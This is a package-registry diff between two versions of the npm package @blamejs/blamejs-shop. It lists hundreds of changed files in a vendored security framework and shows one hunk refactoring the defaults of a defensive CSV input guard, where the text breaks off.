@blamejs/blamejs-shop 0.4.55 → 0.4.57
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/CHANGELOG.md +4 -0
- package/lib/admin.js +385 -2
- package/lib/asset-manifest.json +1 -1
- package/lib/vendor/MANIFEST.json +426 -366
- package/lib/vendor/blamejs/.github/codeql/codeql-config.yml +25 -0
- package/lib/vendor/blamejs/.github/workflows/actions-lint.yml +3 -3
- package/lib/vendor/blamejs/.github/workflows/cflite_batch.yml +1 -1
- package/lib/vendor/blamejs/.github/workflows/cflite_pr.yml +1 -1
- package/lib/vendor/blamejs/.github/workflows/ci.yml +13 -13
- package/lib/vendor/blamejs/.github/workflows/codeql.yml +8 -7
- package/lib/vendor/blamejs/.github/workflows/npm-publish.yml +2 -2
- package/lib/vendor/blamejs/.github/workflows/release-container.yml +4 -4
- package/lib/vendor/blamejs/.github/workflows/scorecard.yml +1 -1
- package/lib/vendor/blamejs/.github/workflows/sha-to-tag-verify.yml +1 -1
- package/lib/vendor/blamejs/CHANGELOG.md +2 -0
- package/lib/vendor/blamejs/api-snapshot.json +1381 -4
- package/lib/vendor/blamejs/eslint.config.mjs +1 -0
- package/lib/vendor/blamejs/examples/wiki/lib/source-comment-block-validator.js +4 -1
- package/lib/vendor/blamejs/examples/wiki/lib/symbol-index.js +5 -2
- package/lib/vendor/blamejs/examples/wiki/routes/pages.js +4 -1
- package/lib/vendor/blamejs/fuzz/guard-text.fuzz.js +20 -0
- package/lib/vendor/blamejs/index.js +2 -0
- package/lib/vendor/blamejs/lib/a2a-tasks.js +7 -23
- package/lib/vendor/blamejs/lib/acme.js +6 -5
- package/lib/vendor/blamejs/lib/agent-event-bus.js +5 -4
- package/lib/vendor/blamejs/lib/agent-idempotency.js +2 -5
- package/lib/vendor/blamejs/lib/agent-orchestrator.js +2 -5
- package/lib/vendor/blamejs/lib/agent-saga.js +3 -5
- package/lib/vendor/blamejs/lib/agent-tenant.js +2 -5
- package/lib/vendor/blamejs/lib/ai-adverse-decision.js +2 -15
- package/lib/vendor/blamejs/lib/ai-capability.js +1 -6
- package/lib/vendor/blamejs/lib/ai-dp.js +1 -5
- package/lib/vendor/blamejs/lib/ai-input.js +2 -2
- package/lib/vendor/blamejs/lib/ai-pref.js +3 -8
- package/lib/vendor/blamejs/lib/ai-quota.js +3 -14
- package/lib/vendor/blamejs/lib/api-key.js +37 -28
- package/lib/vendor/blamejs/lib/archive-adapters.js +2 -4
- package/lib/vendor/blamejs/lib/archive-entry-policy.js +32 -0
- package/lib/vendor/blamejs/lib/archive-read.js +5 -17
- package/lib/vendor/blamejs/lib/archive-tar-read.js +5 -16
- package/lib/vendor/blamejs/lib/archive.js +2 -10
- package/lib/vendor/blamejs/lib/arg-parser.js +7 -6
- package/lib/vendor/blamejs/lib/asyncapi-traits.js +2 -6
- package/lib/vendor/blamejs/lib/atomic-file.js +108 -31
- package/lib/vendor/blamejs/lib/audit-chain.js +133 -53
- package/lib/vendor/blamejs/lib/audit-daily-review.js +24 -14
- package/lib/vendor/blamejs/lib/audit-emit.js +82 -0
- package/lib/vendor/blamejs/lib/audit-sign.js +257 -0
- package/lib/vendor/blamejs/lib/audit.js +84 -0
- package/lib/vendor/blamejs/lib/auth/access-lock.js +5 -27
- package/lib/vendor/blamejs/lib/auth/dpop.js +23 -35
- package/lib/vendor/blamejs/lib/auth/fido-mds3.js +9 -15
- package/lib/vendor/blamejs/lib/auth/jwt-external.js +26 -8
- package/lib/vendor/blamejs/lib/auth/jwt.js +13 -15
- package/lib/vendor/blamejs/lib/auth/lockout.js +6 -25
- package/lib/vendor/blamejs/lib/auth/oauth.js +67 -45
- package/lib/vendor/blamejs/lib/auth/oid4vci.js +55 -32
- package/lib/vendor/blamejs/lib/auth/oid4vp.js +3 -2
- package/lib/vendor/blamejs/lib/auth/openid-federation.js +6 -6
- package/lib/vendor/blamejs/lib/auth/passkey.js +3 -3
- package/lib/vendor/blamejs/lib/auth/password.js +7 -1
- package/lib/vendor/blamejs/lib/auth/saml.js +37 -27
- package/lib/vendor/blamejs/lib/auth/sd-jwt-vc-holder.js +2 -14
- package/lib/vendor/blamejs/lib/auth/sd-jwt-vc-issuer.js +2 -14
- package/lib/vendor/blamejs/lib/auth/sd-jwt-vc.js +1 -1
- package/lib/vendor/blamejs/lib/auth/status-list.js +7 -7
- package/lib/vendor/blamejs/lib/auth/step-up.js +6 -12
- package/lib/vendor/blamejs/lib/auth-bot-challenge.js +6 -37
- package/lib/vendor/blamejs/lib/backup/bundle.js +11 -18
- package/lib/vendor/blamejs/lib/backup/index.js +14 -47
- package/lib/vendor/blamejs/lib/bounded-map.js +112 -1
- package/lib/vendor/blamejs/lib/breach-deadline.js +1 -11
- package/lib/vendor/blamejs/lib/cache.js +7 -18
- package/lib/vendor/blamejs/lib/cbor.js +2 -1
- package/lib/vendor/blamejs/lib/cdn-cache-control.js +8 -9
- package/lib/vendor/blamejs/lib/cert.js +3 -10
- package/lib/vendor/blamejs/lib/chain-writer.js +162 -47
- package/lib/vendor/blamejs/lib/cli.js +5 -1
- package/lib/vendor/blamejs/lib/client-hints.js +7 -9
- package/lib/vendor/blamejs/lib/cloud-events.js +40 -31
- package/lib/vendor/blamejs/lib/cluster-storage.js +2 -38
- package/lib/vendor/blamejs/lib/cms-codec.js +2 -1
- package/lib/vendor/blamejs/lib/codepoint-class.js +67 -1
- package/lib/vendor/blamejs/lib/compliance-ai-act-logging.js +1 -6
- package/lib/vendor/blamejs/lib/compliance-ai-act-transparency.js +2 -4
- package/lib/vendor/blamejs/lib/compliance-eaa.js +1 -11
- package/lib/vendor/blamejs/lib/compliance-sanctions-fetcher.js +21 -28
- package/lib/vendor/blamejs/lib/compliance-sanctions.js +2 -14
- package/lib/vendor/blamejs/lib/compliance.js +2 -9
- package/lib/vendor/blamejs/lib/config-drift.js +2 -12
- package/lib/vendor/blamejs/lib/content-digest.js +10 -8
- package/lib/vendor/blamejs/lib/cookies.js +5 -11
- package/lib/vendor/blamejs/lib/cose.js +19 -11
- package/lib/vendor/blamejs/lib/cra-report.js +1 -11
- package/lib/vendor/blamejs/lib/crypto-field.js +5 -10
- package/lib/vendor/blamejs/lib/crypto.js +120 -3
- package/lib/vendor/blamejs/lib/csp.js +235 -3
- package/lib/vendor/blamejs/lib/daemon.js +42 -41
- package/lib/vendor/blamejs/lib/data-act.js +19 -9
- package/lib/vendor/blamejs/lib/db-query.js +6 -40
- package/lib/vendor/blamejs/lib/db.js +34 -12
- package/lib/vendor/blamejs/lib/dbsc.js +5 -6
- package/lib/vendor/blamejs/lib/ddl-change-control.js +18 -14
- package/lib/vendor/blamejs/lib/deprecate.js +4 -5
- package/lib/vendor/blamejs/lib/did.js +6 -2
- package/lib/vendor/blamejs/lib/dsr.js +8 -12
- package/lib/vendor/blamejs/lib/external-db-migrate.js +21 -22
- package/lib/vendor/blamejs/lib/external-db.js +14 -26
- package/lib/vendor/blamejs/lib/fda-21cfr11.js +12 -8
- package/lib/vendor/blamejs/lib/fdx.js +22 -18
- package/lib/vendor/blamejs/lib/file-upload.js +80 -66
- package/lib/vendor/blamejs/lib/flag-evaluation-context.js +5 -8
- package/lib/vendor/blamejs/lib/framework-error.js +12 -0
- package/lib/vendor/blamejs/lib/framework-schema.js +19 -0
- package/lib/vendor/blamejs/lib/fsm.js +7 -12
- package/lib/vendor/blamejs/lib/gate-contract.js +869 -38
- package/lib/vendor/blamejs/lib/gdpr-ropa.js +4 -13
- package/lib/vendor/blamejs/lib/graphql-federation.js +1 -1
- package/lib/vendor/blamejs/lib/guard-agent-registry.js +2 -1
- package/lib/vendor/blamejs/lib/guard-all.js +1 -0
- package/lib/vendor/blamejs/lib/guard-archive.js +9 -30
- package/lib/vendor/blamejs/lib/guard-auth.js +23 -80
- package/lib/vendor/blamejs/lib/guard-cidr.js +20 -96
- package/lib/vendor/blamejs/lib/guard-csv.js +135 -196
- package/lib/vendor/blamejs/lib/guard-domain.js +23 -106
- package/lib/vendor/blamejs/lib/guard-dsn.js +16 -13
- package/lib/vendor/blamejs/lib/guard-email.js +46 -53
- package/lib/vendor/blamejs/lib/guard-envelope.js +1 -1
- package/lib/vendor/blamejs/lib/guard-event-bus-topic.js +2 -1
- package/lib/vendor/blamejs/lib/guard-filename.js +12 -60
- package/lib/vendor/blamejs/lib/guard-graphql.js +28 -75
- package/lib/vendor/blamejs/lib/guard-html-wcag.js +15 -2
- package/lib/vendor/blamejs/lib/guard-html.js +65 -117
- package/lib/vendor/blamejs/lib/guard-idempotency-key.js +2 -1
- package/lib/vendor/blamejs/lib/guard-image.js +280 -77
- package/lib/vendor/blamejs/lib/guard-imap-command.js +8 -9
- package/lib/vendor/blamejs/lib/guard-json.js +87 -103
- package/lib/vendor/blamejs/lib/guard-jsonpath.js +20 -88
- package/lib/vendor/blamejs/lib/guard-jwt.js +32 -114
- package/lib/vendor/blamejs/lib/guard-list-id.js +2 -7
- package/lib/vendor/blamejs/lib/guard-list-unsubscribe.js +2 -7
- package/lib/vendor/blamejs/lib/guard-mail-compose.js +5 -6
- package/lib/vendor/blamejs/lib/guard-mail-move.js +2 -1
- package/lib/vendor/blamejs/lib/guard-mail-query.js +5 -3
- package/lib/vendor/blamejs/lib/guard-mail-sieve.js +6 -7
- package/lib/vendor/blamejs/lib/guard-managesieve-command.js +5 -4
- package/lib/vendor/blamejs/lib/guard-markdown.js +76 -110
- package/lib/vendor/blamejs/lib/guard-message-id.js +5 -6
- package/lib/vendor/blamejs/lib/guard-mime.js +20 -99
- package/lib/vendor/blamejs/lib/guard-oauth.js +19 -73
- package/lib/vendor/blamejs/lib/guard-pdf.js +65 -72
- package/lib/vendor/blamejs/lib/guard-pop3-command.js +12 -13
- package/lib/vendor/blamejs/lib/guard-posture-chain.js +2 -1
- package/lib/vendor/blamejs/lib/guard-regex.js +24 -99
- package/lib/vendor/blamejs/lib/guard-saga-config.js +2 -1
- package/lib/vendor/blamejs/lib/guard-shell.js +22 -87
- package/lib/vendor/blamejs/lib/guard-smtp-command.js +8 -11
- package/lib/vendor/blamejs/lib/guard-sql.js +15 -13
- package/lib/vendor/blamejs/lib/guard-stream-args.js +2 -1
- package/lib/vendor/blamejs/lib/guard-svg.js +95 -140
- package/lib/vendor/blamejs/lib/guard-template.js +23 -80
- package/lib/vendor/blamejs/lib/guard-tenant-id.js +2 -1
- package/lib/vendor/blamejs/lib/guard-text.js +592 -0
- package/lib/vendor/blamejs/lib/guard-time.js +27 -95
- package/lib/vendor/blamejs/lib/guard-uuid.js +21 -93
- package/lib/vendor/blamejs/lib/guard-xml.js +76 -106
- package/lib/vendor/blamejs/lib/guard-yaml.js +24 -60
- package/lib/vendor/blamejs/lib/http-client-cache.js +5 -12
- package/lib/vendor/blamejs/lib/http-client-cookie-jar.js +2 -4
- package/lib/vendor/blamejs/lib/http-client.js +8 -21
- package/lib/vendor/blamejs/lib/http-message-signature.js +3 -2
- package/lib/vendor/blamejs/lib/i18n-messageformat.js +5 -7
- package/lib/vendor/blamejs/lib/i18n.js +83 -26
- package/lib/vendor/blamejs/lib/inbox.js +8 -8
- package/lib/vendor/blamejs/lib/incident-report.js +3 -21
- package/lib/vendor/blamejs/lib/ip-utils.js +49 -6
- package/lib/vendor/blamejs/lib/jobs.js +3 -2
- package/lib/vendor/blamejs/lib/keychain.js +6 -18
- package/lib/vendor/blamejs/lib/legal-hold.js +6 -15
- package/lib/vendor/blamejs/lib/log-stream-cloudwatch.js +44 -112
- package/lib/vendor/blamejs/lib/log-stream-otlp-grpc.js +17 -14
- package/lib/vendor/blamejs/lib/log-stream-otlp.js +16 -80
- package/lib/vendor/blamejs/lib/log-stream-webhook.js +20 -92
- package/lib/vendor/blamejs/lib/mail-arc-sign.js +8 -3
- package/lib/vendor/blamejs/lib/mail-arf.js +3 -2
- package/lib/vendor/blamejs/lib/mail-auth.js +40 -66
- package/lib/vendor/blamejs/lib/mail-bimi.js +19 -39
- package/lib/vendor/blamejs/lib/mail-crypto-pgp.js +3 -2
- package/lib/vendor/blamejs/lib/mail-dav.js +8 -35
- package/lib/vendor/blamejs/lib/mail-deploy.js +6 -9
- package/lib/vendor/blamejs/lib/mail-dkim.js +19 -38
- package/lib/vendor/blamejs/lib/mail-greylist.js +15 -26
- package/lib/vendor/blamejs/lib/mail-helo.js +2 -3
- package/lib/vendor/blamejs/lib/mail-journal.js +2 -1
- package/lib/vendor/blamejs/lib/mail-mdn.js +4 -3
- package/lib/vendor/blamejs/lib/mail-rbl.js +5 -8
- package/lib/vendor/blamejs/lib/mail-scan.js +2 -2
- package/lib/vendor/blamejs/lib/mail-send-deliver.js +33 -20
- package/lib/vendor/blamejs/lib/mail-server-imap.js +32 -87
- package/lib/vendor/blamejs/lib/mail-server-jmap.js +35 -51
- package/lib/vendor/blamejs/lib/mail-server-managesieve.js +29 -83
- package/lib/vendor/blamejs/lib/mail-server-mx.js +33 -74
- package/lib/vendor/blamejs/lib/mail-server-net.js +177 -0
- package/lib/vendor/blamejs/lib/mail-server-pop3.js +30 -83
- package/lib/vendor/blamejs/lib/mail-server-rate-limit.js +30 -6
- package/lib/vendor/blamejs/lib/mail-server-submission.js +34 -73
- package/lib/vendor/blamejs/lib/mail-server-tls.js +89 -0
- package/lib/vendor/blamejs/lib/mail-spam-score.js +7 -8
- package/lib/vendor/blamejs/lib/mail-store.js +3 -2
- package/lib/vendor/blamejs/lib/mail.js +6 -11
- package/lib/vendor/blamejs/lib/markup-escape.js +31 -0
- package/lib/vendor/blamejs/lib/markup-tokenizer.js +54 -0
- package/lib/vendor/blamejs/lib/mcp-tool-registry.js +26 -23
- package/lib/vendor/blamejs/lib/mcp.js +1 -1
- package/lib/vendor/blamejs/lib/mdoc.js +11 -12
- package/lib/vendor/blamejs/lib/metrics.js +32 -30
- package/lib/vendor/blamejs/lib/middleware/age-gate.js +3 -23
- package/lib/vendor/blamejs/lib/middleware/api-encrypt.js +11 -22
- package/lib/vendor/blamejs/lib/middleware/assetlinks.js +2 -7
- package/lib/vendor/blamejs/lib/middleware/bearer-auth.js +2 -1
- package/lib/vendor/blamejs/lib/middleware/body-parser.js +31 -48
- package/lib/vendor/blamejs/lib/middleware/bot-disclose.js +7 -10
- package/lib/vendor/blamejs/lib/middleware/bot-guard.js +2 -10
- package/lib/vendor/blamejs/lib/middleware/csrf-protect.js +13 -2
- package/lib/vendor/blamejs/lib/middleware/daily-byte-quota.js +6 -26
- package/lib/vendor/blamejs/lib/middleware/deny-response.js +19 -1
- package/lib/vendor/blamejs/lib/middleware/fetch-metadata.js +7 -0
- package/lib/vendor/blamejs/lib/middleware/idempotency-key.js +4 -20
- package/lib/vendor/blamejs/lib/middleware/rate-limit.js +20 -28
- package/lib/vendor/blamejs/lib/middleware/scim-server.js +3 -2
- package/lib/vendor/blamejs/lib/middleware/security-headers.js +9 -1
- package/lib/vendor/blamejs/lib/middleware/security-txt.js +2 -6
- package/lib/vendor/blamejs/lib/middleware/tus-upload.js +12 -27
- package/lib/vendor/blamejs/lib/middleware/web-app-manifest.js +2 -7
- package/lib/vendor/blamejs/lib/migrations.js +4 -13
- package/lib/vendor/blamejs/lib/mime-parse.js +34 -17
- package/lib/vendor/blamejs/lib/module-loader.js +44 -0
- package/lib/vendor/blamejs/lib/money.js +105 -0
- package/lib/vendor/blamejs/lib/mtls-ca.js +116 -36
- package/lib/vendor/blamejs/lib/network-byte-quota.js +4 -18
- package/lib/vendor/blamejs/lib/network-dane.js +8 -6
- package/lib/vendor/blamejs/lib/network-dns-resolver.js +97 -6
- package/lib/vendor/blamejs/lib/network-dnssec.js +16 -16
- package/lib/vendor/blamejs/lib/network-heartbeat.js +3 -2
- package/lib/vendor/blamejs/lib/network-smtp-policy.js +29 -41
- package/lib/vendor/blamejs/lib/network-tls.js +40 -42
- package/lib/vendor/blamejs/lib/nis2-report.js +1 -11
- package/lib/vendor/blamejs/lib/nonce-store.js +81 -3
- package/lib/vendor/blamejs/lib/numeric-bounds.js +22 -8
- package/lib/vendor/blamejs/lib/object-store/azure-blob-bucket-ops.js +2 -6
- package/lib/vendor/blamejs/lib/object-store/azure-blob.js +5 -45
- package/lib/vendor/blamejs/lib/object-store/gcs.js +8 -71
- package/lib/vendor/blamejs/lib/object-store/http-put.js +1 -5
- package/lib/vendor/blamejs/lib/object-store/http-request.js +128 -0
- package/lib/vendor/blamejs/lib/object-store/sigv4-bucket-ops.js +2 -1
- package/lib/vendor/blamejs/lib/object-store/sigv4.js +9 -77
- package/lib/vendor/blamejs/lib/observability-otlp-exporter.js +9 -25
- package/lib/vendor/blamejs/lib/observability.js +95 -0
- package/lib/vendor/blamejs/lib/openapi-paths-builder.js +7 -3
- package/lib/vendor/blamejs/lib/otel-export.js +7 -10
- package/lib/vendor/blamejs/lib/outbox.js +43 -37
- package/lib/vendor/blamejs/lib/pagination.js +11 -15
- package/lib/vendor/blamejs/lib/parsers/safe-env.js +5 -4
- package/lib/vendor/blamejs/lib/parsers/safe-ini.js +10 -4
- package/lib/vendor/blamejs/lib/parsers/safe-toml.js +11 -9
- package/lib/vendor/blamejs/lib/parsers/safe-xml.js +2 -2
- package/lib/vendor/blamejs/lib/parsers/safe-yaml.js +7 -6
- package/lib/vendor/blamejs/lib/pick.js +63 -5
- package/lib/vendor/blamejs/lib/pipl-cn.js +69 -59
- package/lib/vendor/blamejs/lib/privacy-pass.js +8 -6
- package/lib/vendor/blamejs/lib/problem-details.js +2 -5
- package/lib/vendor/blamejs/lib/pubsub.js +4 -8
- package/lib/vendor/blamejs/lib/redact.js +2 -1
- package/lib/vendor/blamejs/lib/render.js +4 -2
- package/lib/vendor/blamejs/lib/request-helpers.js +133 -6
- package/lib/vendor/blamejs/lib/restore.js +5 -22
- package/lib/vendor/blamejs/lib/retention.js +3 -5
- package/lib/vendor/blamejs/lib/safe-async.js +457 -0
- package/lib/vendor/blamejs/lib/safe-buffer.js +137 -6
- package/lib/vendor/blamejs/lib/safe-decompress.js +2 -1
- package/lib/vendor/blamejs/lib/safe-dns.js +2 -1
- package/lib/vendor/blamejs/lib/safe-ical.js +12 -26
- package/lib/vendor/blamejs/lib/safe-json.js +7 -8
- package/lib/vendor/blamejs/lib/safe-jsonpath.js +6 -5
- package/lib/vendor/blamejs/lib/safe-mime.js +25 -29
- package/lib/vendor/blamejs/lib/safe-redirect.js +2 -5
- package/lib/vendor/blamejs/lib/safe-schema.js +7 -6
- package/lib/vendor/blamejs/lib/safe-sql.js +126 -0
- package/lib/vendor/blamejs/lib/safe-vcard.js +12 -26
- package/lib/vendor/blamejs/lib/sandbox-worker.js +9 -2
- package/lib/vendor/blamejs/lib/sandbox.js +3 -2
- package/lib/vendor/blamejs/lib/scheduler.js +5 -12
- package/lib/vendor/blamejs/lib/sec-cyber.js +82 -37
- package/lib/vendor/blamejs/lib/seeders.js +4 -11
- package/lib/vendor/blamejs/lib/self-update.js +92 -69
- package/lib/vendor/blamejs/lib/session-device-binding.js +112 -66
- package/lib/vendor/blamejs/lib/session.js +194 -6
- package/lib/vendor/blamejs/lib/sql.js +225 -78
- package/lib/vendor/blamejs/lib/sse.js +6 -10
- package/lib/vendor/blamejs/lib/static.js +136 -98
- package/lib/vendor/blamejs/lib/storage.js +4 -2
- package/lib/vendor/blamejs/lib/structured-fields.js +275 -16
- package/lib/vendor/blamejs/lib/tenant-quota.js +2 -20
- package/lib/vendor/blamejs/lib/tsa.js +11 -15
- package/lib/vendor/blamejs/lib/validate-opts.js +154 -8
- package/lib/vendor/blamejs/lib/vault/seal-pem-file.js +30 -48
- package/lib/vendor/blamejs/lib/vault-aad.js +3 -2
- package/lib/vendor/blamejs/lib/vc.js +2 -7
- package/lib/vendor/blamejs/lib/vex.js +35 -13
- package/lib/vendor/blamejs/lib/web-push-vapid.js +23 -20
- package/lib/vendor/blamejs/lib/webhook-dispatcher.js +706 -0
- package/lib/vendor/blamejs/lib/webhook.js +43 -18
- package/lib/vendor/blamejs/lib/websocket-channels.js +9 -7
- package/lib/vendor/blamejs/lib/websocket.js +7 -3
- package/lib/vendor/blamejs/lib/worm.js +2 -3
- package/lib/vendor/blamejs/lib/ws-client.js +8 -10
- package/lib/vendor/blamejs/package.json +1 -1
- package/lib/vendor/blamejs/release-notes/v0.15.13.json +81 -0
- package/lib/vendor/blamejs/scripts/check-changelog-extract.js +1 -1
- package/lib/vendor/blamejs/test/00-primitives.js +136 -7
- package/lib/vendor/blamejs/test/10-state.js +9 -3
- package/lib/vendor/blamejs/test/30-chain.js +40 -0
- package/lib/vendor/blamejs/test/helpers/check.js +18 -0
- package/lib/vendor/blamejs/test/helpers/db.js +4 -0
- package/lib/vendor/blamejs/test/helpers/index.js +1 -0
- package/lib/vendor/blamejs/test/integration/audit-chain-external-db.test.js +2 -1
- package/lib/vendor/blamejs/test/integration/audit-stack-postgres.test.js +2 -1
- package/lib/vendor/blamejs/test/integration/data-layer-mysql.test.js +8 -1
- package/lib/vendor/blamejs/test/integration/data-layer-pg.test.js +1 -1
- package/lib/vendor/blamejs/test/integration/framework-schema-mysql.test.js +2 -1
- package/lib/vendor/blamejs/test/integration/webhook-dispatcher-pg.test.js +269 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/atomic-file-fd-read.test.js +149 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/audit-framework-namespaces.test.js +51 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/audit-sign-anchor.test.js +88 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/audit-use-store.test.js +55 -1
- package/lib/vendor/blamejs/test/layer-0-primitives/backup-object-store-adapter.test.js +2 -2
- package/lib/vendor/blamejs/test/layer-0-primitives/bot-guard.test.js +1 -1
- package/lib/vendor/blamejs/test/layer-0-primitives/bounded-map.test.js +129 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/chain-writer-multichain.test.js +107 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/cli-api-key.test.js +12 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/codebase-patterns.test.js +2788 -3214
- package/lib/vendor/blamejs/test/layer-0-primitives/codepoint-class.test.js +78 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/crypto-base64url.test.js +63 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/crypto-hash-stream.test.js +2 -1
- package/lib/vendor/blamejs/test/layer-0-primitives/csp-builder.test.js +50 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/csp-nonce.test.js +1 -1
- package/lib/vendor/blamejs/test/layer-0-primitives/daemon.test.js +2 -1
- package/lib/vendor/blamejs/test/layer-0-primitives/defineguard-resolve-opts.test.js +76 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/flag.test.js +9 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/gate-contract-content-gate.test.js +290 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/guard-csv.test.js +84 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/guard-email.test.js +78 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/guard-filename.test.js +23 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/guard-gate-disposition-coverage.test.js +93 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/guard-html.test.js +60 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/guard-image.test.js +184 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/guard-imap-command.test.js +0 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/guard-json.test.js +54 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/guard-managesieve-command.test.js +10 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/guard-markdown.test.js +45 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/guard-pdf.test.js +101 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/guard-pop3-command.test.js +18 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/guard-svg.test.js +76 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/guard-text.test.js +365 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/guard-xml.test.js +35 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/guard-yaml.test.js +36 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/i18n.test.js +20 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/inbox.test.js +15 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/ip-utils.test.js +83 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/mail-arf.test.js +10 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/mail-auth.test.js +39 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/mail-dkim.test.js +36 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/mail-greylist.test.js +17 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/mail-server-tls.test.js +39 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/mail-store.test.js +17 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/mime-parse.test.js +106 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/money.test.js +17 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/mtls-ca-revocation.test.js +98 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/nonce-store-release.test.js +77 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/observability.test.js +48 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/rate-limit-memory-getorinsert.test.js +100 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/request-helpers.test.js +88 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/safe-async-loops.test.js +278 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/safe-buffer-linear-scans.test.js +37 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/safe-jsonpath.test.js +14 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/sandbox.test.js +19 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/security-headers.test.js +1 -1
- package/lib/vendor/blamejs/test/layer-0-primitives/self-update.test.js +2 -1
- package/lib/vendor/blamejs/test/layer-0-primitives/session-device-binding.test.js +18 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/session-extensions.test.js +1 -1
- package/lib/vendor/blamejs/test/layer-0-primitives/session-valid-from.test.js +73 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/sql.test.js +100 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/structured-fields.test.js +80 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/validate-opts-shape.test.js +235 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/webhook-dispatcher.test.js +374 -0
- package/lib/vendor/blamejs/test/layer-0-primitives/webhook.test.js +75 -8
- package/lib/vendor/blamejs/test/layer-5-integration/guard-host-integration.test.js +3 -3
- package/lib/winback-campaigns.js +202 -42
- package/package.json +1 -1
|
@@ -113,7 +113,6 @@ var BIDI_RE = codepointClass.BIDI_RE;
|
|
|
113
113
|
var BIDI_RE_G = codepointClass.BIDI_RE_G;
|
|
114
114
|
var C0_CTRL_RE = codepointClass.C0_CTRL_RE;
|
|
115
115
|
var C0_CTRL_RE_G = codepointClass.C0_CTRL_RE_G;
|
|
116
|
-
var ZERO_WIDTH_RE = codepointClass.ZERO_WIDTH_RE;
|
|
117
116
|
var ZW_RE_G = codepointClass.ZW_RE_G;
|
|
118
117
|
var NULL_RE_G = codepointClass.NULL_RE_G;
|
|
119
118
|
var HOMOGLYPH_RE = new RegExp("[" + _charClass(HOMOGLYPH_RANGES) + "]"); // allow:dynamic-regex — codepoints from HOMOGLYPH_RANGES literal table
|
|
@@ -157,12 +156,6 @@ var FORMULA_PREFIXES = Object.freeze(_stringFromCps(FORMULA_PREFIX_CPS).split(""
|
|
|
157
156
|
// Default row count cap for serialize. 2^20 ~ 1M rows.
|
|
158
157
|
var DEFAULT_MAX_ROWS = 0x100000;
|
|
159
158
|
|
|
160
|
-
// Forensic-snippet sizes per compliance posture.
|
|
161
|
-
var FORENSIC_SNIPPET_HIPAA = C.BYTES.bytes(256);
|
|
162
|
-
var FORENSIC_SNIPPET_PCI_DSS = C.BYTES.bytes(256);
|
|
163
|
-
var FORENSIC_SNIPPET_GDPR = C.BYTES.bytes(128);
|
|
164
|
-
var FORENSIC_SNIPPET_SOC2 = C.BYTES.bytes(512);
|
|
165
|
-
|
|
166
159
|
// ---- Profile presets ----
|
|
167
160
|
|
|
168
161
|
var PROFILES = Object.freeze({
|
|
@@ -220,71 +213,28 @@ var PROFILES = Object.freeze({
|
|
|
220
213
|
},
|
|
221
214
|
});
|
|
222
215
|
|
|
223
|
-
var DEFAULTS =
|
|
216
|
+
var DEFAULTS = gateContract.strictDefaults(PROFILES, {
|
|
224
217
|
delimiter: ",",
|
|
225
218
|
lineEnding: "\r\n",
|
|
226
219
|
encoding: "utf-8",
|
|
227
220
|
locale: "C",
|
|
228
|
-
formulaInjectionPolicy: "prefix-tab",
|
|
229
221
|
formulasAllowlist: Object.freeze(["SUM", "AVERAGE", "COUNT", "MIN", "MAX", "IF", "CONCATENATE"]),
|
|
230
222
|
dangerousFunctions: DANGEROUS_FUNCTIONS,
|
|
231
|
-
bomPrefix: false,
|
|
232
223
|
maxRows: DEFAULT_MAX_ROWS,
|
|
233
224
|
maxCellBytes: C.BYTES.kib(64),
|
|
234
225
|
maxTotalBytes: C.BYTES.gib(1),
|
|
235
226
|
maxColumns: 0x400,
|
|
236
227
|
sanitizeAmplificationCap: 1.5,
|
|
237
|
-
controlCharPolicy: "reject",
|
|
238
|
-
bidiCharPolicy: "reject",
|
|
239
|
-
homoglyphPolicy: "audit",
|
|
240
|
-
nullByteHandling: "reject",
|
|
241
|
-
trailingWhitespacePolicy: "trim",
|
|
242
|
-
dialectPolicy: "strict",
|
|
243
